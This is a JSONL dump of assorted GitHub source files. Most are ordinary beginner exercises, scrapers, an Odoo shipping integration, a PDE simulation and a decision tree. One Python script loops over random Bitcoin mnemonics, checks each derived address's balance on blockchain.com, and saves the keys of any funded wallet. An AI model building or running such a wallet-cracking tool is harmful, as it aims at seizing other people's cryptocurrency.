número\n\twhile numeroDecimal.isdigit() == False:\n\t\tnumeroDecimal = input(\"Incorrecto. Introduce un nº decimal: \")\n\n\t#Comprobamos que el número introducido es un decimal, en caso de que no lo sea seguirá pidiendo input hasta que el usuario meta un número decimal\n\twhile \".\" in numeroDecimal or \",\" in numeroDecimal:\n\t\tnumeroDecimal = input(\"Incorrecto. Introduce un nº decimal: \")\n\n\t##llamamos a la función que va a convertir el número decimal en binario, pasamos el número introducido por el usuario a entero para poder hacer las operaciones precisas\n\tcodigoBinario = convierte_binario(int(numeroDecimal))\n\n\t##mostramos en pantalla\n\tprint(\"El nº \" + numeroDecimal + \" en codigo binario es: \" + codigoBinario)\n\tprint(\" \")\n\t##preguntamos al usuario si quiere convertir otro número\n\tconvertir = input(\"¿Quieres convertir otro número?(S/N)\")\t\n\n##Si no quiere seguir convistiendo nos depedimos\nprint(\"Agur!\")\n\n\n\n","repo_name":"igorbustinza/theegg_ai","sub_path":"tarea24/tarea24.py","file_name":"tarea24.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16524832991","text":"#Faça um programa que pergunte o preço de três produtos e informe qual produto você deve comprar, \n#sabendo que a decisão é sempre pelo mais barato.\n\nproduto1= float(input('digite o preço do primeiro produto: '))\n\nproduto2= float(input('digite o preço do segundo produto: '))\n\nproduto3= float(input('digite o preço do terceiro produto: '))\n\nmenorPreco=produto1\nnumeroProduto = 1\n\nif produto2 < menorPreco:\n menorPreco = produto2\n numeroProduto = 2\n\n\nif produto3 < menorPreco:\n menorPreco = produto3\n numeroProduto = 3\n\nprint('Você deve comprar o produto', numeroProduto, 'porque é o mais barato.')\n\n#if é uma condição para o produto e o if sera verificado individualmente","repo_name":"jomaatheus/Facisa","sub_path":"exercicios/exercicio_3/questao7.py","file_name":"questao7.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14238276568","text":"#!/usr/bin/python3\n\n# Imports\nimport sys\nimport time\nfrom bip_utils import Bip39MnemonicGenerator, Bip39SeedGenerator\nfrom bip_utils import Bip44, Bip44Changes, Bip44Coins\nfrom bip_utils import Bip49\nfrom bip_utils import Bip84\n#from utils import *\nfrom bs4 import BeautifulSoup\nimport requests as req\nfrom time import perf_counter\n\nfile = open(\"file_key.txt\",\"a+\") \n\n#\n# Constants\n#\n\n# Allowed arguments\nALLOWED_ARGS = (\"bip44\", \"bip49\", \"bip84\")\n# Map from argument to Bip class type\nARG_TO_BIP_CLASSES = { \"bip44\" : Bip44, \"bip49\" : Bip49, \"bip84\" : Bip84 }\n# Number of words to generate mnemonic\nMNEMONIC_WORDS_NUM = 12\n# Account index for keys derivation\nACCOUNT_IDX = 0\n# Chain type for keys derivation\nCHANGE_TYPE = Bip44Changes.CHAIN_EXT\n# Number of address to be check for a wallet\nADDRESS_MAX_NUM = 20\n# Time to sleep after each address check\nSLEEP_TIME = 0.3\n\n#\n# Functions\n#\n\n# Validate arguments\ndef query(address,bip_obj_mst,mnemonic,bip_obj_acc):\n url=\"https://www.blockchain.com/btc/address/\"+address\n page=req.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n a=soup.find_all('span',class_=\"sc-1ryi78w-0 cILyoi sc-16b9dsl-1 ZwupP u3ufsr-0 eQTRKC\")\n count=0\n for i in a:\n for j in i:\n count+=1\n if(count==6):\n # print(i.contents[0].split(\" \")[0])\n print(\"balance is \"+i.contents[0].split(\" \")[0]+ \" for \"+address)\n if float(i.contents[0].split(\" \")[0]): # comment line 26 and 27 if u dont want to stop if balance is greater than 0 for an address \n file.writelines(\"Mnemonic: %s\" % mnemonic)\n file.writelines(\"\\n\")\n file.writelines(\"Master key WIF : %s\" % bip_obj_mst.PrivateKey().ToWif())\n file.writelines(\"\\n\")\n file.writelines(\"Master key : %s\" % bip_obj_mst.PrivateKey().ToExtended())\n file.writelines(\"\\n\")\n file.writelines(\"Account private key: %s\" % bip_obj_acc.PrivateKey().ToExtended())\n file.writelines(\"\\n\")\n file.writelines(\"Account public key : %s\" % bip_obj_acc.PublicKey().RawUncompressed().ToHex())\n file.writelines(\"\\n\")\n file.writelines(\"Scanning the first %d addresses...\" % ADDRESS_MAX_NUM)\n file.writelines(\"\\n --------- \\n\")\n \n\ndef validate_args(argv):\n return len(argv) == 1 and argv[0] in ALLOWED_ARGS\n\n# Print usage\ndef print_usage():\n print(\"Usage:\")\n print(\" python main.py <BIP_CLASS>\")\n print(\"Where BIP_CLASS = bip44, bip49 or bip84\")\n print(\"Example:\")\n print(\" python main.py bip44\")\n\n# Main function\ndef main(argv):\n # Check if arguments are valid\n if not validate_args(argv):\n print_usage()\n sys.exit(1)\n\n # Get BIP class to be used from argument\n bip_class = ARG_TO_BIP_CLASSES[argv[0]]\n\n itr_num = 1\n stop = False\n # Main loop\n while not stop:\n # Generate random mnemonic\n mnemonic = Bip39MnemonicGenerator().FromWordsNumber(MNEMONIC_WORDS_NUM)\n # Generate seed from mnemonic\n seed_bytes = Bip39SeedGenerator(mnemonic).Generate()\n # Generate master key from seed\n bip_obj_mst = bip_class.FromSeed(seed_bytes,Bip44Coins.BITCOIN)\n # Generate account keys\n bip_obj_acc = bip_obj_mst.Purpose().Coin().Account(ACCOUNT_IDX)\n # Generate chain keys\n bip_obj_chain = bip_obj_acc.Change(CHANGE_TYPE)\n # Print\n print(\"******************** ITERATION %d ********************\" % itr_num)\n print(\"Mnemonic: %s\" % mnemonic)\n print(\"Master key WIF : %s\" % bip_obj_mst.PrivateKey().ToWif())\n print(\"Master key : %s\" % bip_obj_mst.PrivateKey().ToExtended())\n print(\"Account private key: %s\" % bip_obj_acc.PrivateKey().ToExtended())\n print(\"Account public key : %s\" % bip_obj_acc.PublicKey().RawUncompressed().ToHex())\n print(\"Scanning the first %d addresses...\" % ADDRESS_MAX_NUM)\n\n\n # Check the addresses\n i = 0\n while i < ADDRESS_MAX_NUM and not stop:\n try:\n # Derive address keys\n bip_obj_addr = bip_obj_chain.AddressIndex(i)\n # Get address string\n addr_str = bip_obj_addr.PublicKey().ToAddress().strip()\n query(addr_str,bip_obj_mst,mnemonic,bip_obj_acc)\n\n \n i += 1\n\n # Error in generating address keys\n except Exception:\n i += 1\n print(\"Unable to save address data to file\")\n\n # Sleep some time\n time.sleep(SLEEP_TIME)\n\n\n# Execute main\nif __name__ == \"__main__\":\n try:\n main(sys.argv[1:])\n # Stop if CTRL+C is pressed\n except KeyboardInterrupt:\n file.close()\n print(\"CTRL+C pressed, stopping...\")\n","repo_name":"shibu130/bip44-bip39-bip84-wallet-gen-and-query","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"26194422600","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom recipes.models import FavoriteRecipe, ShoppingCart\nfrom users.models import Subscription, User\n\n\nclass FavoriteInline(admin.TabularInline):\n model = FavoriteRecipe\n\n\nclass ShoppingCartInline(admin.TabularInline):\n model = ShoppingCart\n\n\nclass SubscriptionInline(admin.TabularInline):\n model = Subscription\n fk_name = 'subscriber'\n\n\n@admin.register(User)\nclass UserAdmin(UserAdmin):\n list_filter = ('email', 'username')\n inlines = [FavoriteInline, ShoppingCartInline, SubscriptionInline]\n","repo_name":"v-sinitsin/foodgram-project-react","sub_path":"backend/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6457284654","text":"import os\nimport sys\n\nsys.path.append('E:\\\\Escritorio\\\\Trabajo\\\\Proyectos Django\\\\NewsScrap\\\\newsscrap')\n\nimport django\nfrom twisted.internet.task import LoopingCall\nfrom twisted.internet import reactor\nfrom scrapy.selector import Selector\nfrom django.apps import AppConfig\nfrom scrapy.spiders import Rule\nfrom scrapy.crawler import CrawlerRunner\nfrom scrapy.selector import Selector\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\",'newsscrap.settings.local')\ndjango.setup()\nfrom applications.publico.models import NoticiasPublico\n\n\n\nclass ExtractorPublico(CrawlSpider, AppConfig):\n\n name = \"Noticias\"\n\n custom_settings = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36\"\n }\n start_urls = ['https://www.publico.es/politica#analytics-cabecera-comprimida:submenu']\n\n download_delay = 2\n\n rules = (\n Rule(\n LinkExtractor(\n allow=r'l#analytics-seccion:listado'\n ),follow=True, callback=\"parse_noticias\"\n ),\n )\n\n def parse_noticias(self, response):\n \n response = Selector(response)\n\n enlace = response.xpath(\"//body/@data-url\")\n\n titulo = response.xpath(\"//h1/text()\")\n\n imagen = response.xpath(\"//img[@class='ImagenAperturaClick']/@src\")\n\n descripcion = response.xpath(\"//div[@class='article-header-epigraph col-12']/h2/text()\")\n \n datos = NoticiasPublico(\n titulo = titulo.get(),\n descripcion = descripcion.get(),\n url = \"https://www.publico.es\"+enlace.get(),\n imagen = \"https://www.publico.es\"+imagen.get()\n )\n \n datos.save()\n \n print('Noticias extraidas')\n\n\nrunner = CrawlerRunner()\ntask = LoopingCall(lambda: runner.crawl(ExtractorPublico))\ntask.start(7200)\nreactor.run()","repo_name":"JahelCuadrado/NewsScrap","sub_path":"newsscrap/static/publico/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40075707735","text":"import logging, urllib, gzip, requests, json, csv, os, tempfile\nfrom odoo import api, models, fields, _\nfrom odoo.exceptions import UserError, ValidationError\nfrom . import consignor_request\nfrom ppretty import ppretty\n\n_logger = logging.getLogger(__name__)\n\nclass ProviderConsignor(models.Model):\n _inherit = 'delivery.carrier'\n\n delivery_type = fields.Selection(selection_add=[('consignor', \"Consignor\")], ondelete={'consignor': 'cascade'})\n\n # TODO Set the needed properties for interacting with the Consignor API\n consignor_server_url = fields.Char(string=\"Server URL\")\n consignor_server_key = fields.Char(string=\"Key\")\n consignor_actor_id = fields.Char(string=\"Account ID\")\n consignor_categ_id = fields.Many2one('product.category', ondelete='cascade')\n consignor_test_mode = fields.Boolean(default=True, string=\"Test Mode\", help=\"Uncheck this box to use production Consignor Web Services\")\n\n # This was removed in Odoo 10, but is used by this plugin\n partner_id = fields.Many2one('res.partner', string='Transporter Company', help=\"The partner that is doing the delivery service.\")\n consignor_product_prod_csid = fields.Integer(related=\"product_id.consignor_product_prod_csid\", string=\"Product CSID\")\n\n def load_consignor_actor(self):\n _logger.info(\"load_consignor_actor\")\n\n url = self.consignor_server_url\n values = {'actor': self.consignor_actor_id,\n 'key': self.consignor_server_key,\n 'command': 'GetProducts'}\n data = urllib.parse.urlencode(values).encode(\"utf-8\")\n response = requests.get(url, data=data)\n\n # import pdb;pdb.set_trace()\n ### Testing Purpose ###\n # Simulator URL: http://consignorsupport.no/testbench/ShipmentServer.aspx\n # values1 = {'actor': \"63\",\n # 'key': \"sample\",\n # 'command': 'GetProducts'}\n # data1 = urllib.parse.urlencode(values).encode(\"utf-8\")\n # url1 = \"http://sstest.consignor.com/ship/ShipmentServerModule.dll\"\n # response = requests.get(url1, data=data1)\n\n res = response.json()\n\n # Reading the Carriers information\n for Carrier in res.get('Carriers'):\n carrier_partner_id = self.insert_update_carrier(Carrier)\n\n # Reading the SubCarrier information - This is the high level services offered by the Carrier\n for SubCarrier in Carrier['Subcarriers']:\n sub_carrier_csid = SubCarrier['SubcarrierCSID']\n try:\n sub_carrier_concept_id = SubCarrier['SubcarrierConceptID']\n except KeyError:\n sub_carrier_concept_id = None\n sub_carrier_name = SubCarrier['SubcarrierName']\n _logger.info(str(sub_carrier_name))\n\n # Reading the product information within each service offered by the Carrier\n for Product in SubCarrier['Products']:\n product_prod_csid = Product['ProdCSID']\n try:\n product_prod_concept_id = Product['ProdConceptID']\n except KeyError:\n product_prod_concept_id = None\n\n product_prod_name = Product['ProdName']\n _logger.info(\" - \" + str(product_prod_name))\n\n if not self.consignor_test_mode:\n # Now we are able to create the delivery product in Odoo\n delivery_product = self.env['product.product'].search([('consignor_sub_carrier_csid', '=',\n sub_carrier_csid), ('consignor_product_prod_csid', '=', product_prod_csid )])\n if not delivery_product:\n _logger.info(\"Insert product\")\n vals = {\n 'name': sub_carrier_name + \" - \" + product_prod_name,\n 'type': 'service',\n 'invoice_policy': 'order',\n 'purchase_method': 'receive',\n 'list_price': 0.00,\n 'consignor_sub_carrier_csid': sub_carrier_csid,\n 'consignor_product_prod_csid': product_prod_csid\n }\n delivery_product = self.env['product.product'].create(vals)\n delivery_product_supplier = self.env['product.supplierinfo'].create({'name': carrier_partner_id,\n 'company_id': 1,\n 'product_id': delivery_product.id})\n\n else:\n _logger.info(\"Update product\")\n vals = {\n 'name': sub_carrier_name + \" - \" + product_prod_name,\n 'type': 'service',\n 'invoice_policy': 'order',\n 'purchase_method': 'receive',\n 'consignor_sub_carrier_csid': sub_carrier_csid,\n 'consignor_product_prod_csid': product_prod_csid\n }\n delivery_product.write(vals)\n\n # Insert or update the Delivery product in Delivery Carrier model\n delivery_carrier = False\n try:\n delivery_carrier = self.env['delivery.carrier'].search([('product_id', '=', delivery_product.id),\n ('partner_id', '=', carrier_partner_id)])\n # break\n except ValueError:\n _logger.info('product_id not found')\n\n if not delivery_carrier:\n _logger.info(\"Insert carrier\")\n vals = {\n 'name': sub_carrier_name,\n 'delivery_type': 'consignor',\n 'product_id': delivery_product.id,\n 'partner_id': carrier_partner_id,\n 'consignor_server_url': self.consignor_server_url,\n 'consignor_server_key': self.consignor_server_key,\n 'consignor_actor_id': self.consignor_actor_id\n }\n delivery_carrier = self.env['delivery.carrier'].create(vals)\n _logger.info(delivery_carrier.id)\n else:\n _logger.info(\"Delivery carrier update\")\n vals = {\n 'name': sub_carrier_name,\n 'delivery_type': 'consignor',\n 'product_id': delivery_product.id,\n 'partner_id': carrier_partner_id,\n 'consignor_server_url': self.consignor_server_url,\n 'consignor_server_key': self.consignor_server_key,\n 'consignor_actor_id': self.consignor_actor_id\n }\n delivery_carrier.write(vals)\n\n\n return []\n\n def insert_update_carrier(self,Carrier=[]):\n # Insert or update the Carrier information in res.partner model\n carrier_partner = self.env['res.partner'].search([('consignor_carrier_csid', '=', Carrier['CarrierCSID'])])\n if not carrier_partner:\n _logger.info(\"Insert \" + str(Carrier['CarrierFullName']))\n vals = {\n 'company_type': 'company',\n 'name': Carrier['CarrierFullName'],\n 'consignor_carrier_csid': Carrier['CarrierCSID'],\n 'consignor_carrier_full_name': Carrier['CarrierFullName'],\n 'consignor_carrier_short_name': Carrier['CarrierShortName']\n }\n if not self.consignor_test_mode:\n carrier_partner = self.env['res.partner'].create(vals)\n _logger.info(carrier_partner.id)\n else:\n _logger.info(\"Update \" + str(Carrier['CarrierFullName']))\n\n return carrier_partner.id\n\n def consignor_rate_shipment(self, orders):\n return {\n \"success\": True,\n \"price\": self.product_id.list_price,\n \"error_message\": False,\n \"warning_message\": False,\n }\n\n def consignor_send_shipping(self, pickings):\n # Save Shipment or Submit Shipment?\n # If Save Shipment, implement a new Status,\n res = []\n\n for picking in pickings:\n _logger.info(\"Creating Consignor shipment for picking \" + str(picking.id) + \" (\" + str(picking.name) + \")\")\n\n # _logger.info(ppretty(picking.carrier_id, seq_length=25))\n\n senderAddress = {}\n senderAddress['Kind'] = '2'\n senderAddress['Name1'] = picking.company_id.name\n senderAddress['Street1'] = picking.company_id.street\n senderAddress['Street2'] = picking.company_id.street2 or \"\"\n senderAddress['PostCode'] = picking.company_id.zip\n senderAddress['City'] = picking.company_id.city\n senderAddress['CountryCode'] = picking.company_id.country_id.code\n\n receiverAddress = {}\n receiverAddress['Kind'] = '1'\n receiverAddress['Name1'] = picking.partner_id.name\n receiverAddress['Street1'] = picking.partner_id.street\n receiverAddress['Street2'] = picking.partner_id.street2 or \"\"\n receiverAddress['PostCode'] = picking.partner_id.zip\n receiverAddress['City'] = picking.partner_id.city\n receiverAddress['CountryCode'] = picking.partner_id.country_id.code\n receiverAddress['Mobile'] = picking.partner_id.mobile or picking.partner_id.phone or \"\"\n receiverAddress['Email'] = picking.sale_id.partner_id.email or picking.partner_id.email\n\n lines = [\n {\n \"PkgWeight\": int(_convert_weight(picking.shipping_weight, \"GR\")) or 1000,\n \"Pkgs\": [\n {\"ItemNo\": 1}\n ]\n }\n ]\n\n submitshipment_data = {}\n submitshipment_data['OrderNo'] = picking.origin\n submitshipment_data['Kind'] = '1'\n submitshipment_data['ActorCSID'] = self.consignor_actor_id\n submitshipment_data['ProdCSID'] = picking.carrier_id.consignor_product_prod_csid\n #submitshipment_data['Addresses'] = '[' + json.dumps(receiverAddress) + ']'\n #submitshipment_data['Addresses'] = '[' + json.dumps(senderAddress) + '],[' + json.dumps(receiverAddress) + ']'\n submitshipment_data['Addresses'] = [senderAddress, receiverAddress]\n submitshipment_data['Lines'] = lines\n\n submitshipment_data['References'] = [\n {\n \"Kind\" : 53,\n \"Value\" : \"Z1\"\n },\n {\n \"Kind\" : 257,\n \"Value\" : \"Z1_doc\" \n }\n ]\n\n json_data = json.dumps(submitshipment_data)\n _logger.info(\"Saving shipment to Consignor\")\n _logger.info(json_data.encode('UTF-8'))\n\n url = self.consignor_server_url\n values = {'actor': self.consignor_actor_id,\n 'key': self.consignor_server_key,\n 'command': 'SubmitShipment',\n 'data': json_data,\n 'options': '{\"Labels\": \"none\", \"UseLocalPrint\": \"1\"}'}\n\n data = urllib.parse.urlencode(values).encode(\"utf-8\")\n response = requests.get(url, data=data)\n\n # _logger.info(response.text)\n js_res = json.loads(response.text)\n\n if \"ErrorMessages\" in js_res:\n raise UserError(\"Error message from Consignor: \" + \", \".join(js_res[\"ErrorMessages\"]))\n\n tmpTracking = \"\"\n try:\n tmpTracking = js_res[\"Lines\"][0][\"Pkgs\"][0][\"PkgNo\"]\n except:\n _logger.info(\"No PkgNo found\")\n\n try:\n tmpTracking = js_res[\"ShpNo\"]\n except:\n _logger.info(\"No ShpNo found\")\n\n _logger.info(tmpTracking)\n\n res = res + [{'tracking_number': tmpTracking, 'exact_price': self.product_id.list_price}]\n\n # Dir = tempfile.mkdtemp()\n # tmp_dir = os.path.join(Dir, \"export\")\n # os.mkdir(tmp_dir)\n\n # report_name = picking.origin + \".csv\"\n # report_dir = os.path.join(\"/tmp\", report_name)\n\n filename = str(picking.id)\n if picking.origin:\n filename = (picking.origin).replace(\"/\",\"_\")\n else:\n filename = (picking.name).replace(\"/\",\"_\")\n \n with open('/odoo/export/' + filename + '.csv', \"w\", newline=\"\") as f:\n fieldnames = ['name', 'street', 'street2', 'postcode', 'city', 'countrycode', 'email', 'mobile', 'ordernumber', 'shipmentid', 'carrier', 'shippingproduct', 'weight', 'consignorid', 'trackingreference']\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n\n writer.writeheader()\n writer.writerow({\n 'name': picking.partner_id.name.encode('ISO 8859-1'),\n 'street': picking.partner_id.street.encode('ISO 8859-1'),\n 'street2': picking.partner_id.street2 and picking.partner_id.street2.encode('ISO 8859-1') or \"\",\n 'postcode': picking.partner_id.zip.encode('ISO 8859-1'),\n 'city': picking.partner_id.city.encode('ISO 8859-1'),\n 'countrycode': picking.partner_id.country_id.code.encode('ISO 8859-1'),\n 'email': (picking.sale_id.partner_id.email or picking.partner_id.email).encode('ISO 8859-1'),\n 'mobile': (picking.partner_id.mobile or picking.partner_id.phone or \"\").encode('ISO 8859-1'),\n 'ordernumber': picking.origin.encode(\"ISO 8859-1\"),\n 'shipmentid': picking.name.encode(\"ISO 8859-1\"),\n 'carrier': self.name.encode(\"ISO 8859-1\"),\n 'shippingproduct': self.product_id.name.encode(\"ISO 8859-1\"),\n 'weight': int(_convert_weight(picking.shipping_weight, \"GR\")) or 1000,\n 'consignorid': js_res[\"ShpCSID\"],\n 'trackingreference': tmpTracking.encode(\"ISO 8859-1\")\n })\n # shutil.rmtree(Dir, ignore_errors=False, onerror=None)\n\n# print json.dumps(res).encode(\"UTF-8\")\n return res\n\n def consignor_get_tracking_link(self, pickings):\n res = []\n return res\n\n def consignor_cancel_shipment(self, picking):\n res = []\n return res\n\n\ndef _convert_weight(weight, unit='KG'):\n ''' Convert picking weight (always expressed in KG) into the specified unit '''\n if unit == 'KG':\n return weight\n elif unit == 'GR':\n return weight * 1000.0\n else:\n raise ValueError\n","repo_name":"korvolles/odoo-consignor","sub_path":"models/delivery_consignor.py","file_name":"delivery_consignor.py","file_ext":"py","file_size_in_byte":15525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31594075804","text":"import numpy as np\nimport h5py\nimport numba as nb\nimport os\nfrom time import time\nfrom pathlib import Path\nimport pde\nfrom pde.tools import mpi\nfrom pde.solvers import Controller\nfrom pde.solvers.explicit_mpi import ExplicitMPISolver\n\nfrom h5py_utils import write_field\n\n\nclass ModelPDE(pde.PDEBase):\n def __init__(\n self,\n bc,\n terrain,\n nu=10 / 3,\n eta=3.5,\n rho=0.95,\n gamma=50 / 3,\n delta_b=1 / 30,\n delta_w=10 / 3,\n delta_h=1e-2 / 3,\n a=33.33,\n q=0.05,\n f=0.1,\n p=0.5,\n ):\n self._nu = nu\n self._eta = eta\n self._rho = rho\n self._gamma = gamma\n self._delta_b = delta_b\n self._delta_w = delta_w\n self._delta_h = delta_h\n self._a = a\n self._q = q\n self._f = f\n self._p = p\n\n self._bc = bc\n self._terrain = terrain\n\n def _make_pde_rhs_numba(self, state):\n a = self._a\n q = self._q\n f = self._f\n eta = self._eta\n nu = self._nu\n rho = self._rho\n gamma = self._gamma\n delta_b = self._delta_b\n delta_w = self._delta_w\n delta_h = self._delta_h\n p = self._p\n\n laplace = state.grid.make_operator(\"laplace\", bc=self._bc)\n grad = state.grid.make_operator(\"gradient\", bc=self._bc)\n div = state.grid.make_operator(\"divergence\", bc=self._bc)\n zeta = self._terrain.split_mpi()\n zeta = zeta.data\n\n @nb.jit\n def pde_rhs(state_data, t):\n # state\n b, w, h = state_data\n\n modified_terrain = h + zeta\n j = -2 * delta_h * h * grad(modified_terrain)\n\n rate = np.empty_like(state_data)\n # Calculate constants\n L2 = np.float_power(1 + eta * b, 2)\n gb = nu * w * L2\n gw = gamma * b * L2\n i = a * (b + q * f) / (b + q)\n\n # Calculate time derivatives\n rate[0] = gb * b * (1 - b) - b + delta_b * laplace(b)\n rate[1] = i * h - nu * (1 - rho * b) * w - gw * w + delta_w * laplace(w)\n rate[2] = p - i * h - div(j)\n\n return rate\n\n return pde_rhs\n\n def evolution_rate(self, state: pde.FieldBase, t: float = 0) -> pde.FieldBase:\n b, w, h = state\n\n # Calculate constants\n i = self._a * (b + self._q * self._f) / (b + self._q)\n l2 = np.float_power(1 + self._eta * b, 2)\n gb = self._nu * w * l2\n gw = self._gamma * b * l2\n\n zeta = self._terrain.split_mpi()\n modified_terrain = h + zeta\n j = -2 * self._delta_h * h * modified_terrain.gradient(self._bc)\n\n # Calculate time derivatives\n b_t = gb * b * (1 - b) - b + self._delta_b * b.laplace(self._bc)\n w_t = (\n i * h\n - self._nu * (1 - self._rho * b) * w\n - gw * w\n + self._delta_w * w.laplace(self._bc)\n )\n h_t = self._p - i * h - j.divergence(self._bc)\n\n return pde.FieldCollection([b_t, w_t, h_t])\n\n\ndef run_simulation(output: Path, n: int, tmax: int, L: int, percipitation: float, slope: float):\n # define constants for simulation\n dx = L / n\n dt = 0.5 * np.power(dx, 2) * 1e-1\n shape = (n, n)\n grid_range = [(0, L), (0, L)]\n if mpi.is_main:\n print(f\"dt: {dt:.3e}, dx: {dx:.3e}, n: {n}, range: {grid_range}\")\n\n # create the problem to solve\n grid = pde.CartesianGrid(grid_range, shape, periodic=[True, False])\n terrain = pde.ScalarField(grid, np.fromfunction(lambda _, y: y * slope, shape))\n\n bc_zero_derivative = {\"derivative\": 0}\n bc_zero_flux = {\"value\": 0}\n bc_periodic = \"auto_periodic_neumann\"\n bc = [bc_periodic, [bc_zero_flux, bc_zero_derivative]]\n\n eq = ModelPDE(bc, terrain, p=percipitation)\n solver = ExplicitMPISolver(eq)\n storage = pde.FileStorage(output)\n\n b = pde.ScalarField.random_uniform(grid, 0, 1e-6)\n w = pde.ScalarField(grid, eq._p / eq._nu)\n h = pde.ScalarField(grid, eq._p / eq._a)\n state = pde.FieldCollection([b, w, h])\n\n controller = Controller(\n solver, t_range=tmax, tracker=[\"progress\", storage.tracker(1)]\n )\n controller.run(state, dt=dt)\n \n # write_field(output, terrain.data, \"terrain\")\n \n if mpi.is_main:\n with h5py.File(output, \"a\") as f:\n f.create_dataset(\"terrain\", data=terrain.data)\n f.create_dataset(\"dx\", data=dx)\n f.create_dataset(\"dt\", data=dt)\n f.create_dataset(\"p\", data=percipitation)","repo_name":"yohad/water-connectivity-pypde","sub_path":"water_connectivity/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39999091154","text":"import numpy as np\n\nFLT_EPSILON = np.finfo(float).eps\nPYTHON_MAX_RECURSION_DEPTH = 1000\n\nclass DecisionTreeRegressor:\n def __init__(self, max_depth=PYTHON_MAX_RECURSION_DEPTH, criterion=\"mse\"):\n self.max_depth = max_depth\n self.criterion = criterion\n self.tree = None\n self.n_features = None\n\n def fit(self, X, y):\n self.n_features = X.shape[1]\n self.tree = self.build_tree(X, y, 0)\n\n def predict(self, X):\n predictions = np.array([self.predict_one(x) for x in X])\n return predictions\n\n def predict_one(self, x):\n node = self.tree\n while isinstance(node, dict):\n if x[node[\"feature\"]] <= node[\"thresh\"]:\n node = node[\"left\"]\n else:\n node = node[\"right\"]\n return node\n\n def sample_equal(self, X):\n if len(X) == 0:\n return True\n temp = X[0]\n for x in X:\n if any(x != temp):\n return False\n else:\n return True\n\n def build_tree(self, X, y, depth):\n if len(np.unique(y)) == 1 or self.sample_equal(X):\n return np.mean(y)\n if depth >= self.max_depth:\n return np.mean(y)\n\n best_feature, best_thresh = self.find_best_split(X, y)\n left_X, left_y, right_X, right_y = self.split_data(X, y, best_feature, best_thresh)\n\n if len(left_X) > 0 and len(right_X) > 0:\n left_tree = self.build_tree(left_X, left_y, depth+1)\n right_tree = self.build_tree(right_X, right_y, depth + 1)\n else:\n left_tree = np.mean(y)\n right_tree = np.mean(y)\n\n\n return {\"feature\": best_feature, 'thresh': best_thresh, 'left': left_tree, \"right\": right_tree}\n\n def find_best_split(self, X, y):\n\n best_feature = None\n best_thresh = None\n\n if self.criterion == \"mse\":\n best_mse = np.inf\n for feature in range(self.n_features):\n feature_vals = np.unique(X[:, feature])\n for val in feature_vals:\n left_indices = np.where(X[:, feature] <= val)\n right_indices = np.where(X[:, feature] > val)\n mse_result = self.mse_delta(y, left_indices, right_indices)\n\n if mse_result < best_mse:\n best_mse = mse_result\n best_feature = feature\n best_thresh = val\n else:\n raise Exception(\"Unknown criterion! Please use 'mse'\")\n return best_feature, best_thresh\n\n def mse_delta(self, y, left_indices, right_indices):\n left_indices = left_indices[0]\n right_indices = right_indices[0]\n p = len(left_indices) / len(y)\n return p * self.mse(y[left_indices]) + (1 - p) * self.mse(y[right_indices])\n\n def mse(self, y):\n if len(y) == 0:\n return 0\n else:\n return np.var(y)\n\n def split_data(self, X, y, feat, thresh):\n left_indices = np.where(X[:, feat] <= thresh)[0]\n right_indices = np.where(X[:, feat] > thresh)[0]\n left_X = X[left_indices]\n left_y = y[left_indices]\n right_X = X[right_indices]\n right_y = y[right_indices]\n return left_X, left_y, right_X, right_y\n\n","repo_name":"SleepyVirino/AI_AL","sub_path":"myml/tree/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73017306115","text":"from django.db import models\nfrom django.conf import settings\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\n# The Profile class extends Django's default user model.\nclass Profile(models.Model):\n \"\"\"\n The Profile class is used to associate a profile with a new user.\n The profiles adds additional information to the end user like:\n - The user's title\n - The user's residence country\n - The user's phone\n - The user's affiliation\n \"\"\"\n TITLE_CHOICES = (\n ('Dr', 'Dr'),\n ('Professor', 'Professor'),\n ('Miss', 'Miss'),\n ('Mr', 'Mr'),\n ('Mrs', 'Mrs'),\n ('Ms', 'Ms')\n )\n # There are packages for this but, meh.\n COUNTRY_CHOICES = (\n ('Romania', 'Romania'),\n ('United States', 'United States'),\n ('Afghanistan', 'Afghanistan'),\n ('Albania', 'Albania'),\n ('Algeria', 'Algeria'),\n ('Andorra', 'Andorra'),\n ('Angola', 'Angola'),\n ('Argentina', 'Argentina'),\n ('Armenia', 'Armenia'),\n ('Australia', 'Australia'),\n ('Austria', 'Austria'),\n ('Azerbaijan', 'Azerbaijan'),\n ('Bahamas', 'Bahamas'),\n ('Bahrain', 'Bahrain'),\n ('Bangladesh', 'Bangladesh'),\n ('Barbados', 'Barbados'),\n ('Belarus', 'Belarus'),\n ('Belgium', 'Belgium'),\n ('Belize', 'Belize'),\n ('Benin', 'Benin'),\n ('Bhutan', 'Bhutan'),\n ('Bolivia', 'Bolivia'),\n ('Bosnia Herzegovina', 'Bosnia Herzegovina'),\n ('Botswana', 'Botswana'),\n ('Brazil', 